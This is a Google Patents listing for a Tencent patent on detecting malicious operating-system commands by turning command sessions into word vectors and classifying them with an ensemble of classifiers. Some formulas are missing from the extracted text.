CN110414229B - Operation command detection method, device, computer equipment and storage medium - Google Patents

Operation command detection method, device, computer equipment and storage medium Download PDF

Info

Publication number
CN110414229B
CN110414229B CN201910250265.XA CN201910250265A CN110414229B CN 110414229 B CN110414229 B CN 110414229B CN 201910250265 A CN201910250265 A CN 201910250265A CN 110414229 B CN110414229 B CN 110414229B
Authority
CN
China
Prior art keywords
command
word
session
classification
vector
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN201910250265.XA
Other languages
Chinese (zh)
Other versions
CN110414229A (en
Inventor
陈洁远
关塞
于洋
曾凡
李家昌
聂利权
王伟
阮华
万志颖
李航
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Tencent Technology Shenzhen Co Ltd
Original Assignee
Tencent Technology Shenzhen Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Tencent Technology Shenzhen Co Ltd filed Critical Tencent Technology Shenzhen Co Ltd
Priority to CN201910250265.XA priority Critical patent/CN110414229B/en
Publication of CN110414229A publication Critical patent/CN110414229A/en
Application granted granted Critical
Publication of CN110414229B publication Critical patent/CN110414229B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F18/00Pattern recognition
    • G06F18/20Analysing
    • G06F18/24Classification techniques
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562Static detection

Landscapes

  • Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • General Engineering & Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Computer Hardware Design (AREA)
  • Data Mining & Analysis (AREA)
  • Software Systems (AREA)
  • Physics & Mathematics (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • Life Sciences & Earth Sciences (AREA)
  • Artificial Intelligence (AREA)
  • Bioinformatics & Cheminformatics (AREA)
  • Bioinformatics & Computational Biology (AREA)
  • Computer Vision & Pattern Recognition (AREA)
  • Evolutionary Biology (AREA)
  • Evolutionary Computation (AREA)
  • Information Retrieval, Db Structures And Fs Structures Therefor (AREA)
  • Computer And Data Communications (AREA)

Abstract

The application relates to an operation command detection method, an operation command detection device, computer equipment and a storage medium. The method comprises the following steps: acquiring a target command session input in an operating system, wherein the target command session comprises at least one operation command; acquiring word vectors of all command words contained in the at least one operation command; acquiring command session vectors of the target command session according to word vectors of the command words; and processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target session command contains a command of a specified type. According to the scheme disclosed by the application, the vectorization expression of the command can be adaptively learned without manually extracting the characteristics, and the command of the specified type is automatically identified, so that the detection accuracy of the command of the specified type such as the malicious command is improved.

Description

Operation command detection method, device, computer equipment and storage medium
Technical Field
The embodiment of the application relates to the technical field of computer security, in particular to an operation command detection method, an operation command detection device, computer equipment and a storage medium.
Background
In the computer field, malicious commands are terminal instructions used by an intruder when the intruder intrudes into the operating system. How to accurately identify malicious commands is an urgent problem to be solved in the field of computer security.
In the related art, it is generally required that an expert in the field of computer security grasp important naming by personal experience to generate an important command table. When detecting whether the command session contains a malicious command, detecting whether the command session contains the malicious command according to an important command table.
However, the scheme in the related art relies on manual experience, there are many feature extraction processes performed manually, and for a novel malicious command, an important command table needs to be reconstructed, so that generalization capability is poor, and thus, the accuracy of detecting the malicious command is not high.
Disclosure of Invention
The embodiment of the application provides an operation command detection method, an operation command detection device, computer equipment and a storage medium, which can improve the accuracy of malicious command detection, and the technical scheme is as follows:
in one aspect, there is provided an operation command detection method, the method including:
acquiring a target command session input in an operating system, wherein the target command session comprises at least one operation command;
Acquiring word vectors of all command words contained in the at least one operation command;
acquiring command session vectors of the target command session according to word vectors of the command words;
processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a specified type of command; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
In another aspect, there is provided an operation command detection apparatus including:
a session acquisition module, configured to acquire a target command session input in an operating system, where the target command session includes at least one operation command;
the word vector acquisition module is used for acquiring word vectors of all command words contained in the at least one operation command;
a session vector acquisition module, configured to acquire a command session vector of the target command session according to word vectors of the command words;
the classification module is used for processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a command of a specified type or not; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
Optionally, the session vector acquisition module is configured to,
acquiring the frequency of each command word in a word vector training set, wherein the word vector training set is a set of word vectors corresponding to a training command session;
and according to the frequency of each command word in the word vector training set, carrying out weighted summation on the word vectors of each command word to obtain the command session vector of the target command session.
Optionally, when the word vectors of the command words are weighted and summed according to the frequency of occurrence of the command words in the word vector training set, respectively, to obtain the command session vector of the target command session, the session vector obtaining module is configured to,
smoothing the frequency of each command word in the word vector training set to obtain the weight of each command word;
and carrying out weighted summation on word vectors of all the command words according to weights corresponding to all the command words respectively to obtain command session vectors of the target command session.
Optionally, the apparatus further includes:
the public part removing module is used for removing public parts in the command session vector before the classifying module processes the command session vector through the classifying model to obtain a classifying result, wherein the public parts are obtained through a principal component analysis mode;
And the classification module is used for processing the command session vector after the common part is removed through the classification model to obtain the classification result.
Optionally, the apparatus further includes:
and the replacing module is used for replacing the appointed type element contained in the at least one operation command with the appointed command word before the word vector obtaining module obtains the word vector of each command word contained in the at least one operation command.
Optionally, the specified type element includes at least one of the following type elements:
a field consisting of consecutive digits, an internet protocol IP address, and a command ending language.
Optionally, the word vector obtaining module is configured to perform a step of obtaining a word vector of each command word included in the at least one operation command when the target command session meets a filtering condition.
Optionally, the filtering conditions include at least one of the following conditions:
the corresponding command session does not contain messy codes, the corresponding command session has the correct source, and the acquisition time of the corresponding command session is within the specified time period.
Optionally, the classification model includes n classification sub-models, n is an integer greater than or equal to 2, the classification module is configured to,
Processing the command session vector through the n classification sub-models respectively to obtain classification sub-results output by the n classification sub-models respectively;
and obtaining the classification result according to the classification sub-results output by the n classification sub-models respectively.
Optionally, the classification module is configured to, when the classification result is obtained according to the classification sub-results output by each of the n classification sub-models,
performing binarization processing on classification sub-results output by each of the n classification sub-models to obtain n binarization values;
and obtaining the average value of the n binarized values as the classification result.
Optionally, the classification sub-result is used to indicate a probability of including the specified type of command in the target command session; and the classification module is used for acquiring the average value of the probabilities indicated by the n classification sub-models as the classification result when the classification result is acquired according to the classification sub-results output by the n classification sub-models.
Optionally, the specified type of command includes a malicious command.
In another aspect, a computer device is provided, the computer device comprising a processor and a memory, the memory storing at least one instruction, at least one program, a set of codes, or a set of instructions, the at least one instruction, the at least one program, the set of codes, or the set of instructions being loaded and executed by the processor to implement the method of operation command detection as described above.
In another aspect, a computer readable storage medium having stored therein at least one instruction, at least one program, code set, or instruction set loaded and executed by a processor to implement the operational command detection method as described above is provided.
The technical scheme provided by the application can comprise the following beneficial effects:
the method and the device have the advantages that the characteristics of each word in the operation command are represented through the word vector, the command session vector of the target command session is generated based on the word vector, whether the target command session contains a specified type command (such as a malicious command) is detected through the command session vector and the trained classification model, the scheme does not need to manually extract the characteristics, the vectorization expression of the command can be adaptively learned, the specified type command is automatically identified, and therefore the detection accuracy of the specified type command such as the malicious command is improved.
It is to be understood that both the foregoing general description and the following detailed description are exemplary and explanatory only and are not restrictive of the application as claimed.
Drawings
The accompanying drawings, which are incorporated in and constitute a part of this specification, illustrate embodiments consistent with the application and together with the description, serve to explain the principles of the application.
FIG. 1 is a schematic diagram of an operation command detection system according to an exemplary embodiment;
FIG. 2 is a flowchart illustrating a method of operation command detection, according to an example embodiment;
FIG. 3 is a flow chart illustrating the detection of specified types of commands in accordance with the embodiment of FIG. 2;
FIG. 4 is a flowchart illustrating a method of operation command detection, according to an example embodiment;
FIG. 5 is a flowchart illustrating a malicious command detection according to an example embodiment;
fig. 6 is a block diagram showing the structure of an operation command detection apparatus according to an exemplary embodiment;
fig. 7 is a schematic diagram of a computer device, according to an example embodiment.
Detailed Description
Reference will now be made in detail to exemplary embodiments, examples of which are illustrated in the accompanying drawings. When the following description refers to the accompanying drawings, the same numbers in different drawings refer to the same or similar elements, unless otherwise indicated. The implementations described in the following exemplary examples do not represent all implementations consistent with the application. Rather, they are merely examples of apparatus and methods consistent with aspects of the application as detailed in the accompanying claims.
The embodiment of the application provides an operation command detection scheme which can provide a more accurate malicious command detection effect. In order to facilitate understanding, several terms related to the present application are explained below.
1) Word vector
In natural language processing (Natural Language Processing, NLP) technology, words in sentences are mapped into a high-dimensional vector, so that subsequent computation is facilitated, and the vector corresponding to each Word is a Word vector (Word vector).
2) Command session vector
A command session will typically contain multiple segments of commands. In the embodiment of the application, each section of command can be regarded as a sentence formed by a plurality of words, so that the whole command session is mapped into a high-dimensional vector, and the high-dimensional mapped by the whole command session is the command session vector.
Fig. 1 is a schematic diagram showing a structure of an operation command detection system according to an exemplary embodiment. The system comprises: the detection device 120 and several terminals 140.
The detection device 120 may be a computer device (such as a server), or a computing cluster formed by a plurality of computer devices, or a virtualization platform, or a cloud computing service center.
The terminal 140 may be a terminal device in which an operating system (such as unix system, linux system, windows system, etc.) is installed and which is capable of performing related operations according to an inputted command session, for example, the terminal 140 may be a desktop computer, a laptop (also called a notebook), a mobile phone, a tablet, an e-book reader, smart glasses, a smart watch, an MP3 player (Moving Picture Experts Group Audio Layer III, moving picture experts compression standard audio layer 3), an MP4 (Moving Picture Experts Group Audio Layer IV, moving picture experts compression standard audio layer 4) player, etc.
The terminal 140 is connected to the detecting device 120 through a communication network. Optionally, the communication network is a wired network or a wireless network.
Optionally, the system may further include a management device 160, where the management device 160 is connected to the detection device 120 through a communication network. Optionally, the communication network is a wired network or a wireless network.
Alternatively, the wireless network or wired network described above uses standard communication techniques and/or protocols. The network is typically the Internet, but may be any network including, but not limited to, a local area network (Local Area Network, LAN), metropolitan area network (Metropolitan Area Network, MAN), wide area network (Wide Area Network, WAN), mobile, wired or wireless network, private network, or any combination of virtual private networks. In some embodiments, data exchanged over the network is represented using techniques and/or formats including HyperText Mark-up Language (HTML), extensible markup Language (Extensible Markup Language, XML), and the like. All or some of the links may also be encrypted using conventional encryption techniques such as secure socket layer (Secure Socket Layer, SSL), transport layer security (Transport Layer Security, TLS), virtual private network (Virtual Private Network, VPN), internet protocol security (Internet Protocol Security, IPsec), and the like. In other embodiments, custom and/or dedicated data communication techniques may also be used in place of or in addition to the data communication techniques described above.
Fig. 2 is a flow chart illustrating an operation command detection method that may be used in a computer device, such as the detection device 120 of the system shown in fig. 1 described above, or other computer devices (such as a desktop, notebook, personal workstation, or other server), according to an exemplary embodiment. As shown in fig. 2, the operation command detection method may include the steps of:
step 21, a target command session input in the operating system is acquired, wherein the target command session contains at least one operation command.
Step 22, obtaining word vectors of all command words contained in the at least one operation command.
Step 23, obtaining the command session vector of the target command session according to the word vector of each command word.
And step 24, processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a specified type of command.
The classification model is a machine learning model obtained through training of a command session sample and annotation information, wherein the annotation information is used for indicating whether the command session sample contains the specified type of command.
In the natural language processing technology, the main processing object is words composed of characters, but the characters cannot be directly processed by a computer, so that the words composed of characters need to be converted into codes which can be processed by the computer. The multi-dimensional vector represents words comprising characters, which is a common means for encoding characters in natural language processing.
The scheme of the application constructs word vectors for each command word in the command session, and obtains command session vectors according to the word vectors of each command word, so as to represent the command session in the form of vectors, and then processes the command session vectors through a pre-trained machine learning model, thereby realizing detection of the specified type of commands in the command session. For example, please refer to fig. 3, which illustrates a flowchart of a specific type command detection according to an embodiment of the present application. As shown in fig. 3, the detection device stores a classification model 34 in advance, the classification model 34 is obtained by training a command session sample 36 and label information 37 corresponding to the command session sample 36, and the training process can be completed in the detection device or can be implemented in other computer devices. For the target command session 31, the detection device first acquires the word vector 32 of each command word in the target command session 31, then generates the command session vector 33 according to the word vector 32 of each command word, then inputs the command session vector 33 into a pre-trained classification model 34, and the classification model 34 processes the command session vector 33 and outputs a classification result 35. Subsequently, if the classification result 35 indicates that the target command session 31 contains a command of a specified type, the detection device may present a related prompt, for example, when the command of the specified type is a malicious command, the detection device may issue a warning if the classification result 35 indicates that the target command session 31 contains a malicious command.
The scheme provided by the embodiment of the application performs feature extraction and classification in a machine learning mode, does not need to manually perform feature extraction, can adaptively learn vectorization expression of commands, and automatically recognizes the commands of the specified types, thereby improving the detection accuracy of the commands of the specified types such as malicious commands.
Fig. 4 is a flowchart illustrating an operation command detection method according to an exemplary embodiment, which may be applied to a computer device, such as the detection device 120 of the system shown in fig. 1 described above, or other computer devices (such as a desktop computer, a notebook computer, a personal workstation, or other servers). As shown in fig. 4, the operation command detection method may include the steps of:
step 401, obtaining a target command session input in an operating system, where the target command session includes at least one operation command.
In the embodiment of the application, the detection device can periodically acquire each command session received by each terminal in the system, wherein each command session consists of a plurality of operation commands, and each operation command contains one or more command words.
In the embodiment of the application, the command word can be a word, a punctuation mark, a special symbol and the like contained in a command.
Step 402, replacing the specified type element contained in the at least one operation command with a specified command word.
Optionally, the specified type element includes at least one of the following type elements: a field consisting of consecutive digits, an internet protocol IP address, and a command ending language.
Because the operation command has greater flexibility and more custom commands or parameters than natural language, and different custom commands or parameters have similar information, in order to avoid the custom commands or parameters in the operation command from influencing the subsequent detection result, in the embodiment of the application, the custom commands or parameters in the operation command contained in each command session can be processed in advance, so as to improve the accuracy of subsequent recognition.
The processing of the custom command or parameter in the operation command may be to replace the custom command or parameter belonging to the same type (the content may be different) in the operation command with the same command word.
For example, the detection device may replace all fields in the operation command that are composed of consecutive digits with the same special symbol (e.g., word sign), replace all IP addresses in the operation command with the same special symbol (e.g., word sign), and replace all command ending words in the operation command with the same special symbol (e.g., word sign).
Step 403, obtaining word vectors of command words contained in the at least one operation command.
Optionally, when the word vector of each command word included in the at least one operation command is obtained, if the target command session meets the filtering condition, the step of obtaining the word vector of each command word included in the at least one operation command is performed.
Optionally, the filtering conditions include at least one of the following conditions:
the corresponding command session does not contain messy codes, the corresponding command session has the correct source, and the acquisition time of the corresponding command session is within the specified time period.
When the target command session is acquired, the detection device may generate a situation that the command session is not acquired correctly, so in the embodiment of the present application, before subsequent recognition is performed on each command session, the session that is not acquired/acquired correctly in each command session may be filtered first, and the filtering process may be as follows:
1) The command sessions containing messy codes are filtered out of the command sessions.
When a command session is obtained by mistake, a messy code may appear in the command session, which indicates that some or all command words in the command session are not obtained correctly, and at this time, the detection device may discard the command session with the messy code, or discard the command session with the messy code proportion greater than the preset proportion threshold. The messy code proportion can be the proportion of the number of messy code characters in the command session to the total number of characters in the command session.
2) Command sessions that do not have the correct source among the individual command sessions are filtered out.
In the embodiment of the present application, the detecting device may detect the command session in the specified one or more terminals, so before performing the subsequent steps, the detecting device first determines whether each obtained command session has a correct command source (i.e., a source and which terminal), and if it is determined that the source of a certain command session does not belong to one of the specified one or more terminals, or if a certain command session does not have a command source, the detecting device may discard the command session.
3) And filtering out command sessions, wherein the acquisition time of the command sessions is not in a specified time period.
In the embodiment of the application, the detection device can detect the command session in a time-sharing manner. For example, the detecting device detects command sessions entered in the respective terminals every 24 hours within 24 hours. Therefore, before proceeding with the subsequent steps, the detecting device first determines whether each acquired command session is a command session acquired within 24 hours before the current time, and if the acquisition time of a certain command session is not within 24 hours before the current time, or if a certain command session has no corresponding acquisition time, the detecting device may discard the command session.
In the embodiment of the application, the detection equipment can segment each command session and perform word vector training according to the word segmentation result, namely, a word vector training set is generated according to each command session, the word vector training set contains command words contained in each command session, and the word vector training set is trained through a preset word vector training model to obtain word vectors of each command word in the word vector training set.
Optionally, after the word vector training is performed, the detection device may filter the command words in the word vector training set, to remove the command words with fewer occurrences, for example, to remove the command words with the occurrences less than the preset number threshold.
When training word vectors through the word vector training set, the training device can train the word vectors through a word2vec model. Word2vec is a model for learning semantic knowledge from a large amount of texts in an unsupervised learning manner, and is essentially characterized by learning text to represent semantic information of words in a word vector manner, and mapping semantically similar words to places with close distances through an embedded space, namely mapping the words from the space to which the words originally belong to a new multidimensional space.
The training device may be a detection device, or may be other devices other than the detection device.
Step 404, obtaining the command session vector of the target command session according to the word vector of each command word.
Optionally, when obtaining the command session vector of the target command session according to the word vector of each command word, the detection device may obtain frequencies of occurrence of each command word in a word vector training set, where the word vector training set is a set of word vectors for training the command session; and according to the frequency of each command word in the word vector training set, carrying out weighted summation on the word vectors of each command word to obtain the command session vector of the target command session.
In the embodiment of the application, the detection device can directly take the frequency corresponding to the command word as the weight of the command word, or the detection device can also obtain the weight corresponding to the command word according to the frequency corresponding to the command word and combining a preset weight calculation method.
Optionally, when the word vectors of the command words are weighted and summed according to the frequencies of occurrence of the command words in the word vector training set, respectively, to obtain the command session vector of the target command session, the detection device may perform smoothing processing on the inverse frequencies corresponding to the frequencies of occurrence of the command words in the word vector training set, respectively, to obtain weights corresponding to the command words, respectively; and carrying out weighted summation on word vectors of all the command words according to weights corresponding to all the command words respectively to obtain command session vectors of the target command session.
For example, in the embodiment of the present application, the detection device may perform smoothing on the inverse of the frequency of the command word (i.e., the inverse frequency) to obtain the weight corresponding to the command word. For example, for the target command word, the detection device may divide the smoothing coefficient by the sum of the smoothing coefficient and the frequency of the target command word, and take the obtained result as the weight of the target command word.
Step 405 removes the common part of the command session vector, which is obtained by means of principal component analysis.
In the embodiment of the application, the detection device can perform common part rejection on the command session vector corresponding to each command session to remove the common part in the command session vector corresponding to each command session, wherein the common part can be obtained by a principal component analysis (Principal Component Analysis, PCA) mode.
In step 406, the command session vector after the common portion is removed is processed by a classification model to obtain a classification result, where the classification result is used to indicate whether the target command session includes a command of a specified type.
The classification model is a machine learning model obtained through training of a command session sample and annotation information, wherein the annotation information is used for indicating whether the command session sample contains the specified type of command.
Optionally, the classification model includes n classification sub-models, n is an integer greater than or equal to 2, and when the command session vector is processed through the classification model to obtain a classification result, the detection device can respectively process the command session vector through the n classification sub-models to obtain classification sub-results respectively output by the n classification sub-models; and obtaining the classification result according to the classification sub-results output by the n classification sub-models.
In another example, the detection device may perform binarization processing on the classification sub-results output by the n classification sub-models to obtain n binarized values when the classification result is obtained from the classification sub-results output by the n classification sub-models; and obtaining the average value of the n binarized values as the classification result.
Or, in another example, the classification sub-result is used to indicate a probability of including the specified type of command in the target command session; the detection device may acquire, as the classification result, an average value of probabilities indicated by the respective n classification sub-models when the classification result is acquired from the classification sub-results output by the respective n classification sub-models.
Optionally, the detection device may further display a prompt message according to the classification result output by the classification model, so as to prompt whether the target command session includes the specified type of command.
For example, when the classification result indicates that the target command session contains a malicious command, the detection device may display a reminder, where the reminder is used to prompt that the target command session contains a malicious command, so that a manager can make corresponding processing in time.
In summary, according to the scheme provided by the embodiment of the application, the characteristics of each word in the operation command are represented by the word vector, the command session vector of the target command session is generated based on the word vector, and whether the target command session contains the specified type command (such as the malicious command) is detected by the command session vector and the trained classification model.
Taking the example that the command of the specified type is a malicious command as an example, please refer to fig. 5, which is a flowchart illustrating detection of a malicious command according to an exemplary embodiment. Taking malicious command detection for a command session received by each terminal in a local area network as an example, as shown in fig. 5, the process of malicious command detection may be as follows:
S1, acquiring a command session.
The detection device can collect command sessions input in each terminal in the current local area network, and sort and store the collected command sessions according to time so as to detect malicious commands periodically.
For example, the detection device may perform malicious command detection every 24 hours, and when performing malicious command detection, the detection device may acquire each command session collected and stored in the last 24 hours.
S2, command preprocessing.
This step mainly comprises the following two steps:
1) Filtering dirty data;
in the embodiment of the application, dirty data filtering refers to filtering incorrectly collected command data; among the collected command sessions, the command session containing the messy code (or the command session containing the messy code with the proportion larger than the preset proportion threshold), the command session containing the incorrect source, the command session containing no source, the command session containing the collection time not within the last 24 hours, the command session containing no collection time, and the like.
2) Symbol replacement;
in the embodiment of the application, symbol replacement can refer to the following replacement processing manner for a command session after dirty data filtering:
a) All consecutive numbers are changed into special symbol sign;
b) All IP addresses are changed into special sign SIGNIP;
c) The end of each row of commands in the command session is replaced with a special symbol sign.
S3, extracting command word vectors.
The extraction of the command word vector comprises two steps:
a) Word segmentation;
in order to better utilize all data and context to learn word vectors, the word segmentation uses not only spaces as separators among words, but also punctuation marks and special symbols as separate words, such as file paths: the/etc/hots will be divided into four words/, etc,/, hots.
b) Training word vectors;
in order to reduce the influence of various custom parameters and file names on the model, words with fewer occurrences are filtered first. The Word vector training method is many, and the Word vector training is performed by using the skip-gram model in Word2Vec, for example, the dimension of the Word vector can be 200 dimensions, and the window size is 10.
The principle of the Skip-gram model is to assume that the current word is w t W in sentence t Front and rear words with window length of 2L are w t-L ,…,w t-1 ,w t+1 ,…,w t+L Then the goal of the model is to maximize w t Joint probability of context occurrence of (c):
i p(w t+i |w t ),i∈[-L,L]and i+.0;
the probability calculation mode of the single word is as follows:
Wherein v is w For the input vector representation of word w, v w For the output vector representation of word w, i.e. the same word, as window-centered word w t In this case, the input vector is used for the expression, and in this case, the output vector is used as the predicted word.
The training process uses the input and output vectors of each word as parameters, and finds the vector which maximizes the average probability of the corpus, namely:
s4, extracting command session vectors.
Wherein, the extraction of the command session vector comprises two steps:
a) Word vector combination;
assuming that command session s is made up of |s| words, each word w i Word vector of (a) isThe frequency of occurrence in the whole training set is +.>Session vector:
where a is a smoothing parameter, for example, a=10 may be taken in this scheme -3
b) Removing the public vector;
the command session contains common semantics, and different command sessions can be better distinguished by removing the common semantics, so that the principal common vector is obtained by using PCA and subtracted as the final command session vector.
I.e. let all session vectors be aggregated asThen->The PCA component of (2) is { v } 1 ,v 2 … }, where v 1 Is the first principal component, then the common vector V c =v 1 . Finally, command session vector V' s =V s -V c
S5, command session classification.
In V' s As a feature vector of the command session s, training and classification are performed by a classifier. The scheme adopts a multi-classifier fusion mode, trains a plurality of models including a support vector machine (Support Vector Machine, SVM), logistic regression (Logistic Regression, LR) and Random Forest (Random Forest) in advanceAnd carrying out voting fusion, and taking the result of the majority classifier as a final judgment result. The judging mode is as follows:
a single classifier c outputs whether the command session s is a malicious command, for example, here, 3 classifiers are exemplified, namely LR, SVM, random Forest.
LR: logistic regression
p lr (s=1|x)=φ(x T s+b), whereinIs a sigmoid function. When p is lr And (s= 1|x) > 0.5, judging that the command is a malicious command.
And (3) SVM: support vector machine
The hyperplane is built by support vectors when y= Σ i y i α i k(x i Judging that the command is malicious when x) +b is more than or equal to 0, wherein y i =1 or-1 as support vector x i Is a label of (a) i As support vector x i Coefficient of (x), k (x) i X) is the vector x and x to be measured i Inner product over nuclear space.
Random Forest: random forest
The final classification result is determined in a minority-subject majority voting manner by building a plurality of random trees.
S6, model fusion.
If classifier c determines that command s is a malicious command, L c =1, and vice versa is 0. Let N classifiers (n=3 in the present application) be used in totalIf L is more than or equal to 0.5, finally, s is considered as a malicious command, and an alarm is triggered.
S7, giving a warning.
When s is confirmed to be a malicious command in the step, the detection device can send out alarm information to prompt that the malicious command exists in the command session s so as to be processed by management personnel in time.
The application refers to the word vector technology of NLP to detect malicious commands, and can be applied to unix systems, linux systems and windows systems. According to the application, firstly, a large number of command sessions are used, word vector technology is utilized to extract Word vectors (such as Word2Vec, GLOVE and the like) of commands, then, through smooth inversion frequency (Smooth Inverse Frequency) and PCA, all command Word vectors in the command sessions are combined to become command session vectors, and finally, the command sessions are classified based on the command session vectors through a classifier, so that whether invasion suspicion exists is judged. The scheme disclosed by the application has the following advantages:
1. the time of manually extracting the features is saved, and the analysis of the command does not depend on expert experience any more, so that the generalization capability of the model is stronger and the adaptability is better.
2. The word vector combination mode of smooth frequency and PCA is adopted, the command session vector is simply and rapidly calculated, resources are saved compared with a deep learning mode of utilizing a convolutional neural network and the like, and the accuracy is high enough.
An algorithm framework for malicious command detection based on command vectors is provided, and word vector training and classifier selection in the framework are not limited to the models mentioned in the schemes, and any more efficient and accurate algorithm capable of obtaining word vectors in combination with contexts and classifying by using feature vectors can be used.
Fig. 6 is a block diagram showing a structure of an operation command detection apparatus according to an exemplary embodiment. The operation command detection means may be used in a computer device to perform all or part of the steps in the embodiments shown in fig. 2 or fig. 4. The operation command detection apparatus may include:
a session obtaining module 601, configured to obtain a target command session input in an operating system, where the target command session includes at least one operation command;
a word vector obtaining module 602, configured to obtain a word vector of each command word included in the at least one operation command;
a session vector obtaining module 603, configured to obtain a command session vector of the target command session according to the word vector of each command word;
a classification module 604, configured to process the command session vector through a classification model, to obtain a classification result, where the classification result is used to indicate whether the target command session includes a command of a specified type; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
Optionally, the session vector obtaining module 603 is configured to,
acquiring the frequency of each command word in a word vector training set, wherein the word vector training set is a set of word vectors corresponding to a training command session;
and according to the frequency of each command word in the word vector training set, carrying out weighted summation on the word vectors of each command word to obtain the command session vector of the target command session.
Optionally, when the word vectors of the command words are weighted and summed according to the frequency of occurrence of the command words in the word vector training set, respectively, to obtain a command session vector of the target command session, the session vector obtaining module 603 is configured to,
smoothing the frequency of each command word in the word vector training set to obtain the weight of each command word;
and carrying out weighted summation on word vectors of all the command words according to weights corresponding to all the command words respectively to obtain command session vectors of the target command session.
Optionally, the apparatus further includes:
the common part removing module is configured to remove a common part in the command session vector before the classifying module 604 processes the command session vector through a classification model to obtain a classification result, where the common part is obtained through a principal component analysis mode;
The classification module 604 is configured to process, by using the classification model, the command session vector after the common portion is removed, to obtain the classification result.
Optionally, the apparatus further includes:
and a replacing module, configured to replace a specified type element included in the at least one operation command with a specified command word before the word vector obtaining module 602 obtains the word vector of each command word included in the at least one operation command.
Optionally, the specified type element includes at least one of the following type elements:
a field consisting of consecutive digits, an internet protocol IP address, and a command ending language.
Optionally, the word vector obtaining module 602 is configured to perform a step of obtaining a word vector of each command word included in the at least one operation command when the target command session meets a filtering condition.
Optionally, the filtering conditions include at least one of the following conditions:
the corresponding command session does not contain messy codes, the corresponding command session has the correct source, and the acquisition time of the corresponding command session is within the specified time period.
Optionally, the classification model includes n classification sub-models, n being an integer greater than or equal to 2, the classification module 604 is configured to,
Processing the command session vector through the n classification sub-models respectively to obtain classification sub-results output by the n classification sub-models respectively;
and obtaining the classification result according to the classification sub-results output by the n classification sub-models respectively.
Optionally, in the case of the classification result obtained according to the classification sub-result output by each of the n classification sub-models, the classification module 604 is configured to,
performing binarization processing on classification sub-results output by each of the n classification sub-models to obtain n binarization values;
and obtaining the average value of the n binarized values as the classification result.
Optionally, the classification sub-result is used to indicate a probability of including the specified type of command in the target command session; the classification module 604 is configured to obtain, as the classification result, an average value of probabilities indicated by the n classification sub-models, when the classification result is obtained according to the classification sub-results output by the n classification sub-models.
Optionally, the specified type of command includes a malicious command.
In summary, according to the scheme provided by the embodiment of the application, the characteristics of each word in the operation command are represented by the word vector, the command session vector of the target command session is generated based on the word vector, and whether the target command session contains the specified type command (such as the malicious command) is detected by the command session vector and the trained classification model.
Fig. 7 is a schematic diagram of a computer device, according to an example embodiment. The computer device may be implemented as the detection device 120 or other computer device in the implementation environment shown in fig. 1 described above. The computer apparatus 700 includes a Central Processing Unit (CPU) 701, a system memory 704 including a Random Access Memory (RAM) 702 and a Read Only Memory (ROM) 703, and a system bus 705 connecting the system memory 704 and the central processing unit 701. The computer device 700 also includes a basic input/output system (I/O system) 706, which helps to transfer information between various devices within the computer, and a mass storage device 707 for storing an operating system 713, application programs 714, and other program modules 715.
The basic input/output system 706 includes a display 708 for displaying information and an input device 709, such as a mouse, keyboard, or the like, for a user to input information. Wherein the display 708 and the input device 709 are coupled to the central processing unit 701 through an input output controller 710 coupled to a system bus 705. The basic input/output system 706 may also include an input/output controller 710 for receiving and processing input from a number of other devices, such as a keyboard, mouse, or electronic stylus. Similarly, the input output controller 710 also provides output to a display screen, a printer, or other type of output device.
The mass storage device 707 is connected to the central processing unit 701 through a mass storage controller (not shown) connected to the system bus 705. The mass storage device 707 and its associated computer-readable media provide non-volatile storage for the computer device 700. That is, the mass storage device 707 may include a computer readable medium (not shown) such as a hard disk or CD-ROM drive.
The computer readable medium may include computer storage media and communication media without loss of generality. Computer storage media includes volatile and nonvolatile, removable and non-removable media implemented in any method or technology for storage of information such as computer readable instructions, data structures, program modules or other data. Computer storage media includes RAM, ROM, EPROM, EEPROM, flash memory or other solid state memory technology, CD-ROM, DVD or other optical storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices. Of course, those skilled in the art will recognize that the computer storage medium is not limited to the one described above. The system memory 704 and mass storage device 707 described above may be collectively referred to as memory.
The computer device 700 may be connected to the internet or other computer device through a network interface unit 711 connected to the system bus 705.
The memory further comprises one or more programs stored in the memory, and the central processor 701 implements the steps performed by the detection device in the method shown in fig. 2 or 4 by executing the one or more programs.
In exemplary embodiments, a non-transitory computer readable storage medium is also provided, such as a memory, including a computer program (instructions) executable by a processor of a computer device to perform all or part of the steps of the methods shown in the various embodiments of the application. For example, the non-transitory computer readable storage medium may be ROM, random Access Memory (RAM), CD-ROM, magnetic tape, floppy disk, optical data storage device, etc.
